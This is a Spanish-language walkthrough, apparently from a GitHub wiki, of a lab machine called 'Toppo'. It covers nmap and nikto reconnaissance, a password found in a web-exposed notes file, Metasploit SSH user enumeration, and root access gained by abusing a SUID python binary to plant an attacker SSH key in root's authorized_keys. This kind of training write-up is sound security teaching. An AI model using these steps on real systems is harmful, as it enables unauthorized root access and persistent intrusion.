VM Toppo 32 bits - danielcastropalomares/security GitHub Wiki
Con NMAP detectamos que tiene abierto los puertos 22 y 80 abiertos:
root@kali:~# nmap -A 172.31.255.136
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-28 17:31 CET
Nmap scan report for 172.31.255.136
Host is up (0.00037s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 ec:61:97:9f:4d:cb:75:99:59:d4:c1:c4:d4:3e:d9:dc (DSA)
| 2048 89:99:c4:54:9a:18:66:f7:cd:8e:ab:b6:aa:31:2e:c6 (RSA)
| 256 60:be:dd:8f:1a:d7:a3:f3:fe:21:cc:2f:11:30:7b:0d (ECDSA)
|_ 256 39:d9:79:26:60:3d:6c:a2:1e:8b:19:71:c0:e2:5e:5f (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Clean Blog - Start Bootstrap Theme
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 47325/udp status
|_ 100024 1 51812/tcp status
MAC Address: 08:00:27:8A:1E:36 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Con Nikto analizamos analizamos la estructura del servidor web, encontramos un directorio admin que puede ser interesante:
root@kali:~# nikto -host 172.31.255.136
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 172.31.255.136
+ Target Hostname: 172.31.255.136
+ Target Port: 80
+ Start Time: 2018-10-28 17:29:32 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ Server leaks inodes via ETags, header found with file /, fields: 0x1925 0x563f5cf714e80
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3268: /admin/: Directory indexing found.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3268: /mail/: Directory indexing found.
+ OSVDB-3092: /mail/: This might be interesting...
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7535 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time: 2018-10-28 17:29:44 (GMT1) (12 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Accedemos vía web al directorio y encontramos un fichero de texto llamado "notes.txt", que contiene un password:
http://172.31.255.136/admin/notes.txt
I need to change my password :/ 12345ted123 is too outdated but the technology isn't my thing i prefer go fishing or watching soccer .
La versión de SSH es vulnerable al listado de usuarios:
root@kali:~# nmap -A -p 22 172.31.255.136
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-29 21:38 CET
Nmap scan report for 172.31.255.136
Host is up (0.00040s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh > OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
Así que utilizaremos el exploit enumusers y probamos con el nombre "ted", que se encontraba dentro de la propia contraseña:
msf > use auxiliary/scanner/ssh/ssh_enumusers
msf auxiliary(scanner/ssh/ssh_enumusers) > set RHOSTS 172.31.255.136
RHOSTS => 172.31.255.136
msf auxiliary(scanner/ssh/ssh_enumusers) > set USERNAME ted
USERNAME => ted
msf auxiliary(scanner/ssh/ssh_enumusers) > exploit
[*] 172.31.255.136:22 - SSH - Using malformed packet technique
[*] 172.31.255.136:22 - SSH - Starting scan
[+] 172.31.255.136:22 - SSH - User 'ted' found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
El usuario existe, así que vamos a probar el password que hemos encontrado en el fichero notes.txt:
ssh [email protected]
Una vez dentro, buscamos archivos/ejecutables que se encuentre en modo setuid:
The letter s denotes that the setuid (or setgid, depending on the column) bit is set. When an executable is setuid, it runs as the user who owns the executable file instead of the user who invoked the program
ted@Toppo:~$ find / -perm -2 -type f 2>/dev/null | grep -v proc
/usr/bin/python2.7
141007 -rwsrwxrwx 1 root root 3.8M Aug 13 2016 /usr/bin/python2.7
Encontramos que python se en encuentra en modo SUID. Como la maquina de destino tiene el servicio SSH levantado, vamos a aprovecharnos de ello y copiar nuestra key al authorized_keys al directorio '/root/.ssh'. Vamos a crear un script para copiar con python nuestra clave ssh al directorio root. Primero tendremos que crear el fichero authorized_keys:
cat /tmp/authorized_keys ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCoj4xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx root@kali
Ahora vamos a crear un pequeño script:
ted@Toppo:~$ cat copy_key
import os
from shutil import copyfile
from sys import exit
original = '/root/.ssh/authorized_keys'
bckoriginal = '/tmp/authorized_keys'
source = '/tmp/authorized_keys'
target = '/root/.ssh/authorized_keys'
#Create folder if not exist
if not os.path.exists('/root/.ssh'):
os.makedirs('/root/.ssh')
try:
#backup authorized_keys to /tmp/
copyfile(original, bckoriginal)
#copy new authorized_keys to /root/.ssh
copyfile(source, target)
except IOError as e:
print("Unable to copy file. %s" % e)
exit(1)
except:
print("Unexpected error:", sys.exc_info())
exit(1)
Básicamente lo que haremos es lo siguiente:
- Comprobar si el directorio /root/.ssh existe
- Copiara el fichero /root/.ssh/authorized_keys al /tmp
- Copiara el fichero /tmp/authorized_keys al directorio /root
Ejecutamos el script:
/usr/bin/python2.7 copy_key
Ahora ya podemos entrar al sistema por ssh:
ssh [email protected]
root@Toppo:~# cat flag.txt
_________
| _ _ |
|_/ | | \_|.--. _ .--. _ .--. .--.
| | / .'`\ \[ '/'`\ \[ '/'`\ \/ .'`\ \
_| |_ | \__. | | \__/ | | \__/ || \__. |
|_____| '.__.' | ;.__/ | ;.__/ '.__.'
[__| [__|
Congratulations ! there is your flag : 0wnedlab{p4ssi0n_c0me_with_pract1ce}